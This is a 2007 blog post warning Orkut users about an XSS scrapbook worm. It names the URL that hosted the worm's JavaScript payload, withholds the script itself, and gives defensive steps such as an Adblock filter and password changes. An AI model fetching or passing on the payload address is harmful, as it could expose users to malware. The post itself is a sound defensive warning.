Tuesday, December 18, 2007

Watch out for orkut spam! virus!

I got fooled into spreading a "scrapbook" spam onto all my friends on orkut. I got a funny looking message from a friend of mine which looked like this:

2008 vem ai... que ele comece mto bem para vc

While it is gibberish (Portuguese, loosely translated to "2008 is coming... that it begins really good for you") , this message contains an invisible Javascript embedded (I have the script scrapped from the HTML source but dont want to post it here). But it basically executes a script located at http://files.myopera.com/virusdoorkut/files/virus.js (do not try to open this file).

If you get such a message in your orkut scrapbook, please do not reply to that scrap as it executes the script.

I'd also strongly advise everyone to change their Password.

Update 1: Here's some technical information which says this is an XSS attack.

Update 2: Here's what you should do to protect against this virus (information from talking to a friend in Google):
  1. If you are using Firefox and are using Adblock, add "*virus.js" to the list of filters. That should block the script from running.
  2. Change your "Google Account" password.
  3. You may have been temporarily banned by Orkut. This is a standard response by the system as it detected you sending a scrap to all your contacts. Don't worry. Just stay away from Orkut form 5 to 6 hours and re-login back. You should see a new group called "Infectados pelo Vírus do Orkut" (that's also Portuguese, if you were wondering) appear in your "communities". Unjoin from that group. If you can't just wait for 5-6 hours and retry.
  4. Just to be sure, run a virus scan of your computer.
Update 3: As antrix pointed out in the comments, this vulnerability has been fixed. I was able to login to my orkut account and unjoin from the "Infectados pelo Vírus do Orkut" community. That community had 650,000+ members when I left it. Phew!


  1. Dude,

    I got fooled the same way!! :-(

  2. Hey, Thanks for the link. The vulnerability has been fixed. I've updated my post with more info.